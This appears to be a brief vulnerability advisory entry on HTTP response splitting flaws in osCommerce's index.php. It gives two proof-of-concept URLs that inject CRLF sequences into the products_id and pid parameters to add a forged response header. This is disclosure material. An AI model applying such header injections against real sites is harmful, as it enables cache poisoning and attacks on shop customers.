• info
• discussion
• exploit
• solution
• references

osCommerce Multiple HTTP Response Splitting Vulnerabilities

No exploit is required.

The following proof of concept URI are available:
http://www.example.com/index.php?action=buy_now&products_id=22%0d%0atest:%20poison%20headers!
http://www.example.com/index.php?action=cust_order&pid=2%0d%0atest:%20poison%20headers!